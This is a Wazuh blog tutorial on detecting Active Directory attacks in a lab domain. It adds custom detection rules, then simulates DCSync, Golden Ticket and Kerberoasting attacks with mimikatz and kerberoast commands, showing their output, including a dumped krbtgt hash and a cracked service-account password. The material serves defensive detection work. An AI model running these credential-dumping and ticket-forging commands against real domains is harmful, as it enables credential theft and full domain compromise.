How to detect Active Directory attacks with Wazuh [Part 1 of 2]

| by | Wazuh 4.3
Post icon

Active Directory (AD) is the most widely used Identity and Access Management (IAM) technology for Windows domain networks in modern organizations. It is adopted by small, medium, and large enterprises to manage enterprise networks, so it is an ideal target for attackers. AD is a perfect target for attackers because many system administrators use it to manage enterprise networks.

To defend against threats, organizations need to implement the principle of defense in depth. Implementing several layers of defense mechanisms ensures that when the initial line of defense fails and hackers get access to Active Directory, the consequences are limited and contained. 

In this blog post, we demonstrate how to simulate and detect the following AD attacks:

  • DCSync attacks
  • Golden ticket attacks
  • Kerberoasting attacks
  • Active Directory attacks: Infrastructure setup

    We use the following setup to simulate AD attacks and show how Wazuh can detect them:

    • A Centos 7 endpoint with Wazuh 4.3.10 installed. You can install the Wazuh central components using this Quickstart installation guide.
    • A Windows Server 2022 domain controller running the Wazuh agent 4.3.10. This domain controller hosts the Active Directory infrastructure. You can use this Wazuh agent installation guide for this. In this blogpost we use the domain name wazuhtest.com.
    • A Windows 10 Pro edition endpoint running Wazuh agent 4.3.10. The Windows 10 endpoint is registered to the Active Directory and serves as the attacker’s initial foothold after compromise. 
    • A user account on the Active Directory with local administrative privilege on the compromised Windows 10 endpoint. This user account should have “Replicating Directory Changes” and “Replicating Directory Changes All” privileges to facilitate DCsync attack. This account is the compromised user account used to simulate the attacks. 
    • A service account on the Active Directory with associated servicePrincipalName (SPN). This account is the target of the kerberoasting attack. You can follow this SPN guide to set this up. 
    • A Mimikatz copy in the compromised Windows 10 endpoint. To run the mimikatz.exe, you can navigate to mimikatz_trunk/x64 (or x32, depending on your system architecture). Mimikatz is required to perform the attack simulations.
    • A kerberoast copy from Github and a password word list to perform the kerberoast attack. This password list must contain the password to compromise. 
    • The latest version of Python to run the tgsrepcrack.py script during kerberoasting attack simulation. Ensure to set the environment variable correctly. 

    Detection rules

    To detect AD attacks, we create rules on the Wazuh server to detect IoCs in Windows security events and system events monitored by Sysmon.

    Sysmon integration

    1. Download Sysmon from the Microsoft Sysinternals page with the configuration file sysmonconfig.xml on the Windows 2022 domain controller and the compromised Windows 10  endpoint.

    2. Run the following command to install Sysmon with the downloaded configuration file via PowerShell (run as administrator):

    .\sysmon.exe -accepteula -i sysmonconfig.xml

    3. Configure the Wazuh agents to collect Sysmon events by adding the following settings to the agent configuration file in “C:\Program Files (x86)\ossec-agent\ossec.conf“:

    <ossec_config>
      <localfile>    
        <location>Microsoft-Windows-Sysmon/Operational</location>
        <log_format>eventchannel</log_format>
      </localfile>
    </ossec_config>

    4. Apply the changes by restarting the agents using this PowerShell command:

    Restart-Service -Name wazuh

    Wazuh server configuration

      1. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server to generate alerts on the Wazuh dashboard whenever an attacker performs any of the attacks mentioned above,:

    <group name="security_event, windows,">
     
      <!-- This rule detects DCSync attacks using windows security event on the domain controller -->
      <rule id="110001" level="12">
        <if_sid>60103</if_sid>
        <field name="win.system.eventID">^4662$</field>
        <field name="win.eventdata.properties" type="pcre2">{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}|{19195a5b-6da0-11d0-afd3-00c04fd930c9}</field>
        <options>no_full_log</options>
        <description>Directory Service Access. Possible DCSync attack</description>
      </rule>
     
     <!-- This rule ignores Directory Service Access originating from machine accounts containing $ -->
     <rule id="110009" level="0">
        <if_sid>60103</if_sid>
        <field name="win.system.eventID">^4662$</field>
        <field name="win.eventdata.properties" type="pcre2">{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}|{19195a5b-6da0-11d0-afd3-00c04fd930c9}</field>
        <field name="win.eventdata.SubjectUserName" type="pcre2">$$</field>
        <options>no_full_log</options>
        <description>Ignore all Directory Service Access that is originated from a machine account containing $</description>
      </rule>
     
      <!-- This rule detects Keberoasting attacks using windows security event on the domain controller -->
      <rule id="110002" level="12">
        <if_sid>60103</if_sid>
        <field name="win.system.eventID">^4769$</field>
        <field name="win.eventdata.TicketOptions" type="pcre2">0x40810000</field>
        <field name="win.eventdata.TicketEncryptionType" type="pcre2">0x17</field>
        <options>no_full_log</options>
        <description>Possible Keberoasting attack</description>
      </rule>
     
      <!-- This rule detects Golden Ticket attacks using windows security events on the domain controller -->
      <rule id="110003" level="12">
        <if_sid>60103</if_sid>
        <field name="win.system.eventID">^4624$</field>
        <field name="win.eventdata.LogonGuid" type="pcre2">{00000000-0000-0000-0000-000000000000}</field>
        <field name="win.eventdata.logonType" type="pcre2">3</field>
        <options>no_full_log</options>
        <description>Possible Golden Ticket attack</description>
      </rule>
     
    </group>

    2. Restart the Wazuh server to apply the configuration changes:

    systemctl restart wazuh-manager
    

    Active Directory attacks simulation

    In this section we show how to simulate some common active directory attacks, as mentioned earlier. To successfully simulate the attacks, the attacker compromises a user account with local administrator privileges on the Windows 10 endpoint.

    Note

    The <USERNAME> variable represents the compromised user account name on the active directory, which you use to simulate attacks.

    DCSync attack simulation

    DCSync is a credential dumping technique used by threat actors to compromise domain users’ credentials. This attack abuses the Directory Replication Service (DRS) remote protocol domain controllers used for synchronization and replication. To successfully perform this attack, a threat actor must have access to a domain user account with “Replicating Directory Changes” and “Replicating Directory Changes All” privileges. The following step shows how to perform a DCSync attack:

    1. Run mimikatz as administrator and run the following command in the mimikatz console to replicate KRBTGT credentials from the Active Directory.

    lsadump::dcsync /domain:wazuhtest.com /user:krbtgt
    [DC] 'wazuhtest.com' will be the domain
    [DC] 'Windows2022DC.wazuhtest.com' will be the DC server
    [DC] 'krbtgt' will be the user account
    [rpc] Service  : ldap
    [rpc] AuthnSvc : GSS_NEGOTIATE (9)
    Object RDN           : krbtgt
    ** SAM ACCOUNT **
    SAM Username         : krbtgt
    Account Type         : 30000000 ( USER_OBJECT )
    User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
    Account expiration   :
    Password last change : 11/15/2022 10:06:35 PM
    Object Security ID   : S-1-5-21-1860018313-2454207738-2274937249-502
    Object Relative ID   : 502
    Credentials:
      Hash NTLM: 5a5b25ba4501379b5eca5e4a49c11597
        ntlm- 0: 5a5b25ba4501379b5eca5e4a49c11597
        lm  - 0: b33b34e78d3806e0d4e8b125e31a9cc8

    We can see the NTLM hash of the KRBTGT account is  5a5b25ba4501379b5eca5e4a49c11597.

    The obtained KRBTGT account credential is a prerequisite to perform a Golden ticket attack.

    Golden ticket attack simulation

    Golden tickets are forged authentication tickets that abuse the Kerberos protocol that encrypts and signs messages using shared secrets. Kerberos tickets are generated using the password hash of the KRBTGT user account. These tickets can be used to access systems and data because the tickets are trusted and valid for authentication.

    Note

    The NTLM password hash of the KRBTGT account obtained in the DCSync attack is used to facilitate the Golden ticket attack. 

    1. Run mimikatz as administrator and run the following command to forge Kerberos tickets using the NTLM hash of the KRBTGT account obtained during the DCSync attack.

    mimikatz # kerberos::golden /domain:wazuhtest.com /sid:S-1-5-21-1860018313-2454207738-2274937249 /rc4:<Hash NTLM of KRBTGT> /user:FakeUser /groups:513,2668 /ptt
    User      : FakeUser
    Domain    : wazuhtest.com (WAZUHTEST)
    SID       : S-1-5-21-1860018313-2454207738-2274937249
    User Id   : 500
    Groups Id : *513 2668
    ServiceKey: 40364adcda7fec186497af461dbf990bf42481de4da960fb30b1556e82b2b953 - aes256_hmac
    Lifetime  : 12/2/2022 11:17:34 AM ; 11/29/2032 11:17:34 AM ; 11/29/2032 11:17:34 AM
    -> Ticket : ** Pass The Ticket **
     
     * PAC generated
     * PAC signed
     * EncTicketPart generated
     * EncTicketPart encrypted
     * KrbCred generated
     
    Golden ticket for 'FakeUser @ wazuhtest.com' successfully submitted for current session

    We can see from the output that the golden ticket was successfully submitted for the current session.

    2. Run the following command to open a command prompt session authenticated with the forged Kerberos ticket.

    mimikatz # misc::cmd
    Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7BB9B95E0

    3. Run the klist command to verify the forged ticket is currently loaded into memory for the current session.

    C:\Users\<USERNAME>\Downloads\mimikatz_trunk\x64> klist

    We can see the ticket currently loaded in the memory has the client as Client: FakeUser @ wazuhtest.com.

    Current LogonId is 0:0x186c51
    Cached Tickets: (1)
    #0>    Client: FakeUser @ wazuhtest.com
            Server: krbtgt/wazuhtest.com @ wazuhtest.com
            KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
            Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
            Start Time: 12/2/2022 11:17:34 (local)
            End Time:   11/29/2032 11:17:34 (local)
            Renew Time: 11/29/2032 11:17:34 (local)
            Session Key Type: AES-256-CTS-HMAC-SHA1-96
            Cache Flags: 0x1 -> PRIMARY
            Kdc Called:

    Kerberoasting attack simulation

    Kerberoasting is an attack technique that involves an attacker abusing the privilege given to authenticated users to request a Ticket Granting Service (TGS) ticket for any servicePrincipalName (SPN) from a domain controller. The ticket may be encrypted with a Cipher suite like RC4, HMAC, or MD5 using the password hash of the service account associated with the SPN. The threat actor extracts the password hash of the ticket and attempts to crack the password offline.

    You will need a copy of kerberoast from Github, Mimikatz, and a password word list to simulate the kerberoasting attack. 

    1. Run PowerShell as administrator and change the current directory to the kerberoast-master directory. Then run the GetUserSPNs.ps1 command to enumerate the ServicePrincipalName of service accounts on the Active Directory.

    PS C:\Windows\system32> cd C:\Users\<USERNAME>\Downloads\kerberoast-master
    PS C:\Users\<USERNAME>\Downloads\kerberoast-master> .\GetUserSPNs.ps1
    ServicePrincipalName : http/Windows10
    Name                 : Test-Svc
    SAMAccountName       : Test-Svc
    MemberOf             :
    PasswordLastSet      : 11/25/2022 2:18:49 AM
    ServicePrincipalName : kadmin/changepw
    Name                 : krbtgt
    SAMAccountName       : krbtgt
    MemberOf             : CN=Denied RODC Password Replication Group,CN=Users,DC=wazuhtest,DC=com
    PasswordLastSet      : 11/15/2022 10:06:35 PM

    We can see that the ServicePrincipalName of the Test-Svc service account is http/Windows10.

    2. Run the command below to request an RC4-encrypted Kerberos TGS  ticket.

    PS C:\Users\<USERNAME>\Downloads\kerberoast-master> Add-Type -AssemblyName System.IdentityModel
    PS C:\Users\<USERNAME>\Downloads\kerberoast-master> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "http/Windows10"
    Id                   : uuid-28ff0ce8-06df-49c9-a6eb-b20d1391e56c-1
    SecurityKeys         : {System.IdentityModel.Tokens.InMemorySymmetricSecurityKey}
    ValidFrom            : 12/2/2022 12:29:20 PM
    ValidTo              : 12/2/2022 10:26:08 PM
    ServicePrincipalName : http/Windows10
    SecurityKey          : System.IdentityModel.Tokens.InMemorySymmetricSecurityKey

    3. Launch mimikatz on the PS command prompt and run the kerberos::list /export command to dump the tickets to the kerberoast-master directory on the endpoint.

    PS C:\Users\<USERNAME>\Downloads\kerberoast-master> C:\Users\<USERNAME>\Downloads\mimikatz_trunk\x64\mimikatz.exe
     
    mimikatz # kerberos::list /export
    [00000000] - 0x00000012 - aes256_hmac
       Start/End/MaxRenew: 12/2/2022 12:26:08 PM ; 12/2/2022 10:26:08 PM ; 12/9/2022 12:26:08 PM
       Server Name       : krbtgt/WAZUHTEST.COM @ WAZUHTEST.COM
       Client Name       : <USERNAME> @ WAZUHTEST.COM
       Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
       * Saved to file     : 0-40e10000-<USERNAME>@krbtgt~WAZUHTEST.COM-WAZUHTEST.COM.kirbi
    [00000001] - 0x00000017 - rc4_hmac_nt
       Start/End/MaxRenew: 12/2/2022 12:29:20 PM ; 12/2/2022 10:26:08 PM ; 12/9/2022 12:26:08 PM
       Server Name       : http/Windows10 @ WAZUHTEST.COM
       Client Name       : <USERNAME> @ WAZUHTEST.COM
       Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
       * Saved to file     : 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi

    4. Exit mimikatz and run the Get-ChildItem command to view the exported tickets in the kerberoast-master directory. 

    mimikatz # exit
    Bye!
    PS C:\Users\<USERNAME>\Downloads\kerberoast-master> Get-ChildItem

    We can see the ticket generated for the test-svc service account saved as 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi.

    Directory: C:\Users\<USERNAME>\Downloads\kerberoast-master
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-----        12/2/2022  12:51 PM                examples
    -a----        12/2/2022  12:56 PM           1452 0-40e10000-<USERNAME>@krbtgt~WAZUHTEST.COM-WAZUHTEST.COM.kirbi
    -a----        12/2/2022  12:56 PM           1554 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi
    -a----        12/2/2022  12:56 PM           1578 
    -a----       11/25/2022   3:46 AM           1387 ticket.kirbi
    -a----       11/25/2022   3:24 AM            865 wordlist.txt

    5. Run the following command replacing wordlist.txt with your own password list file and replacing the target ticket to crack the password of the target service account with your own. The tgsrepcrack.py script is included in the kerberoast package. You can download a dictionary of potential passwords online or create a simple password list using notepad. You can achieve this by typing potential passwords in a notepad and saving the file as a .txt file.

    PS C:\Users\<USERNAME>\Downloads\kerberoast-master> ./tgsrepcrack.py wordlist.txt 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi
    USE HASHCAT, IT'S HELLA FASTER!!
     
    Cracking 1 tickets...
    found password for ticket 0: Password20  File: 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi
    Successfully cracked all tickets
    PS C:\Users\<USERNAME>\Downloads\kerberoast-master>

    Detection result

    After simulating the attacks, the alerts are generated on the Wazuh dashboard based on the events from the Windows 2022 domain controller:

    Active Directory attacks

    Conclusion

    Active Directory is a core component that facilitates the centralized administration of identities and resources in any organization. It has become a target for most attackers due to its wide adoption and uses. Hence, it is necessary to detect and defend against these attacks. It is essential to detect early indications of lateral movement and privilege escalation as it aids in preventing attacks.

    This blog shows how Wazuh detects some common Active Directory attacks using Windows security logs and events captured on Sysmon.